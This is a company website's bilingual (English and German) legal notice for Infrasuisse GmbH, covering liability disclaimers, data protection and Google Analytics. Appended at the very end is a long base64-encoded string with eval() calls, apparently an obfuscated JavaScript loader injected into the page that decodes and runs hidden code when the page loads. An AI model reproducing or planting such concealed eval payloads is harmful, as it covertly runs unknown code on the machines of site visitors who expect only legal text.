Legal Notice

Content:
© Infrasuisse GmbH, Baar/Zug, Switzerland

Disclaimer:

1. Limitation of responsibility:
This is the website of Infrasuisse GmbH. The following points apply to all pages and subpages of this website. Persons who access these webpages and retrieve information acknowledge and accept the following provisions:

2. Use:
Infrasuisse GmbH makes every effort to ensure the secure operation of this website. Nonetheless, it cannot be ruled out that deficiencies or errors such as the loss/falsification of data, virus attacks, operational interruptions, etc., occur. Accessing these webpages is therefore undertaken at the sole risk and responsibility of the user.

3. Exclusion from liability:
Infrasuisse GmbH disclaims any liability for direct or indirect damages that could arise from accessing its website and any ancillary elements thereof (e.g. downloaded documents), their use or the inability to access/use them, or embedded links to other websites.

4. Exclusion of warranty:
Infrasuisse GmbH assumes no responsibility for the currentness, completeness or quality of the information provided on this website. Any and all liability claims against Infrasuisse GmbH relating to damages of a material or non-material nature allegedly caused by the use of the provided information are expressly precluded. Infrasuisse GmbH reserves the right to alter, supplement or delete portions or individual pages of the website without any separate notification.

5. Linked websites (continuative links):
These webpages may contain certain links to third-party websites. Infrasuisse GmbH assumes no responsibility whatsoever for the content, products, services or other offerings presented on those websites nor for their compliance with data protection provisions. The activation of any such link is undertaken at the sole responsibility of the user.

6. Data protection:
We process the data transmitted to us by users for the sole purpose of responding to their enquiries, communicating with them or improving our website. All automatically generated information which we receive and store is evaluated exclusively for internal purposes. We do not require users to provide personal details in order to initiate downloads. We are committed not to forward any such data to third parties unless doing so is in complete accord with the Data Protection Act.

7. Google Analytics:
Infrasuisse GmbH uses Google Analytics, a web analysis service of Google Inc. («Google»). Google Analytics works with so-called. «cookies» (small text files that are stored on the user’s computer) and enables us to analyse the use of this website. The related information compiled by such cookies (including the user’s IP address) is forwarded to one of Google’s servers in den USA and stored there. Google in turn processes that information to evaluate the use of our website, generate for our attention reports on such activities and render further services related to the use of the website and Internet in general. Under circumstances, Google as well will forward this information to third parties if doing so is in conformity with law and to the extent that those parties process the data at the behest of Google. In no case will Google associate the user’s IP address with other data it compiles. Users can prevent the installation of cookies by activating the appropriate settings in their browser. By accessing this website, users acknowledge and agree with the further processing of their data by Google in the aforementioned manner and for the aforementioned purpose.

Rechtliche Informationen

Inhalt:
© Infrasuisse GmbH, Baar/Zug, Switzerland

Haftungserklärung:

1. Einschränkung der Haftung:
Dies ist die Internetseite der Infrasuisse GmbH. Die folgenden Punkte gelten für alle Seiten und Unterseiten dieses Internetauftrittes. Personen welche diese Internetseiten aufrufen und Infomration daraus gebrauchen, anerkennen und akzeptieren folgende Bestimmungen:

2. Nutzung:
Infrasuisse GmbH bemüht sich, den sicheren Betrieb dieses Internetauftrittes sicherzustellen. Trotzdem kann nicht ausgeschlossen werden, dass es Mängel oder Fehler wie Verlust/Fälschungen von Daten, Virusattacken, Nutzungsunterbrüche u.ä. geben kann. Aufrufen dieser Internetseiten geschieht auf alleiniges Risiko und Verantwortung des Benutzers.

3. Ausschluss der Haftung:
Infrasuisse GmbH lehnt jegliche Haftung von direkten und indirekten Schäden ab, welche durch den Zugriff und der Nutzung des Webauftrittes und jedwelche Zusatzinformationen (z.B. heruntergeladene Dokumente) entstehen könnten, inkl. deren Nutzung oder Unmöglichkeit des Zugriffs/der Benutzung oder eingebundener Links zu anderen Internetseiten.

4. Garantieausschluss:
Infrasuisse GmbH übernimmt keine Verantwortung für die Richtigkeit, Vollständigkeit oder Qualität der auf den Internetseiten aufgezeigten Informationen. Jedwelche und alle Haftungsansprüche gegen Infrasuisse GmbH im Zusammenhang mit Schäden in erheblicher und nicht-erheblicher Natur welche mutmasslich durch diese Informationen entstanden sind, sind ausdrücklich ausgeschlossen. Infrasuisse GmbH behält sich das Recht vor, Teile oder Internetseiten zu ändern, zu ergänzen oder zu löschen oder Teile davon zu löschen ohne spezielle Benachrichtigung.

5. Vernetzte Internetseiten (weiterführende Vernetzung):
Diese Internetseiten können gewisse Vernetzungen zu Dritt-Parteien-Internetseiten enthalten. Infrasuisse GmbH übernimmt keinerlei Verantwortung über den Inhalt, Produkte, Dienstleistungen oder andere Angebote, welche auf diesen externen Internetseiten präsentiert werden. Dies gilt auch für die Einhaltung des Datenschutzes dieser externen Internetseiten. Das Aufrufen solcher Vernetzungen liegt in der Verantwortung des Benutzers.

6. Datenschutz:
Wir verarbeiten nur Daten, welche uns durch Benutzer mittels Anfragen und Kommunikation mit Benutzern oder bezüglich Verbesserungen unseres Internetauftrittes übermittelt werden. Alle automatisch generierten Informationen, welche wir erhalten, werden nur für interne Zwecke ausgewertet und gespeichert. Wir benötigen keine persönlichen Informationen zum Zweck des Herunterladens. Wir setzen uns dafür ein, keine Daten an Drittparteien zu übermitteln, ausser ein solches Handeln verstösst gegen das Datenschutzgesetz.

7. Google Analytics:
Infrasuisse GmbH benutzt Google Analytics, ein Internet Analyse-Service von Google Inc. («Google»). Google Analytics arbeitet mit «cookies» (kleine Text-Dateien welche auf dem Nutzercomputer gespeichert werden) und ermöglicht uns die Nutzungsanalyse unserer Internetseite. Die Information solcher cookies (inkl. die IP-Adresse des Benutzers) wird an einen der Google-Server in den USA weitergeleitet und dort gespeichert. Google wiederum verarbeitet diese Informationen, um die Nutzung unserer Internetseite zu ermitteln und erstellt für uns Übersichten von Aktivitäten und anderer Dienstleistungen im Zusammenhang mit der Nutzung unserer Internetseite und des Internets im Generellen. Unter Umständen sendet Google diese Informationen an Drittparteien, wenn solches Tun gesetzeskonform ist und diese Partien die Daten im Auftrag von Google verarbeiten. In keinem Fall wird Google die IP-Adresse des Benutzers mit anderen gesammelten Daten verbinden. Benutzer können die Erstellung von Cookies mittels Aktiviereung der spezifischen Einstellungen im Browser verhindern. Mit dem Nutzen dieser Internetseiten anerkennt und akzeptiert der Nutzer die Weiterverarbeitung durch Google in der beschriebenen Form und Verwendungszweck.

DkgLSA5LCAxMjEgLSA2LCAxMjAgLSA0LCAxMTYgLSAyLCAxMTMgLSA4LCAxMTcgLSA3LCAxMDcgLSA0LCA1NCAtIDgsIDEwMSAtIDIsIDExMiAtIDgsIDEwNSAtIDgsIDExOSAtIDUsIDczIC0gNiwgMTEyIC0gMSwgMTA4IC0gOCwgMTAzIC0gMiwgNzIgLSA3LCAxMjAgLSA0LCA0NSAtIDUsIDExNCAtIDksIDQ1IC0gNCwgMzkgLSA3LCA5OSAtIDUsIDE2IC0gNiwgMTQgLSA1LCAxMiAtIDMsIDE1IC0gNiwgMTMgLSA0LCAxMTQgLSA3LCAxMDcgLSA2LCAxMzAgLSA5LCA1MiAtIDYsIDEwMSAtIDIsIDExMSAtIDcsIDk4IC0gMSwgMTE3IC0gMywgNzIgLSA1LCAxMTcgLSA2LCAxMDYgLSA2LCAxMDMgLSAyLCA3MiAtIDcsIDEyNCAtIDgsIDQ0IC0gNCwgMTE0IC0gOSwgMzYgLSA0LCAzOSAtIDIsIDM1IC0gMywgMTE2IC0gOSwgMTA4IC0gNywgMTIyIC0gMSwgNDkgLSAzLCAxMTQgLSA2LCAxMDYgLSA1LCAxMTQgLSA0LCAxMDcgLSA0LCAxMjMgLSA3LCAxMTAgLSA2LCA0OSAtIDgsIDQ3IC0gNiwgNjAgLSAxLCAxMyAtIDMsIDM5IC0gNywgMzggLSA2LCAxMzEgLSA2LCAxOCAtIDgsIDM4IC0gNiwgMzMgLSAxLCAxMjAgLSA2LCAxMDcgLSA2LCAxMjUgLSA5LCAxMTggLSAxLCAxMTUgLSAxLCAxMTUgLSA1LCAzMyAtIDEsIDEyMiAtIDgsIDEwNiAtIDUsIDEyMSAtIDYsIDYwIC0gMSwgMTggLSA4LCAxMzEgLSA2LCAxOSAtIDksIDE2IC0gNiwgMTI2IC0gOCwgMTA0IC0gNywgMTE4IC0gNCwgMzUgLSAzLCAxMDIgLSAyLCAxMDIgLSAxLCAxMDEgLSAyLCA0MCAtIDgsIDY0IC0gMywgMzcgLSA1LCAxMjMgLSAzLCAxMTkgLSA4LCAxMjAgLSA2LCA5OCAtIDMsIDEwOCAtIDcsIDExMiAtIDIsIDEwOCAtIDksIDQ5IC0gOSwgMTAwIC0gMywgMTI1IC0gOSwgMTEyIC0gMSwgMTA0IC0gNiwgNDEgLSAxLCAxMTAgLSA5LCAxMTUgLSA1LCAxMDYgLSA3LCAxMDggLSA3LCAxMDIgLSAyLCA0OSAtIDgsIDQ1IC0gMSwgNDEgLSA5LCAxMTUgLSA4LCAxMDMgLSAyLCAxMjggLSA3LCA0NyAtIDYsIDY0IC0gNSwgMTEgLSAxLCA0NSAtIDUsIDExNiAtIDYsIDEwNSAtIDQsIDEyNiAtIDcsIDM2IC0gNCwgNzIgLSAyLCAxMTggLSAxLCAxMTIgLSAyLCAxMDYgLSA3LCAxMjUgLSA5LCAxMDcgLSAyLCAxMTcgLSA2LCAxMTYgLSA2LCA0NSAtIDUsIDEwMiAtIDIsIDEwNSAtIDQsIDEwNyAtIDgsIDUwIC0gOSwgNDQgLSAzLCA0OCAtIDgsIDQ2IC0gNSwgNjggLSA5LCAxNyAtIDcsIDE3IC0gNyk7ZXZhbChDQVBQU0xOTlFSKTs=’);
eval(WLYFZTRAXL);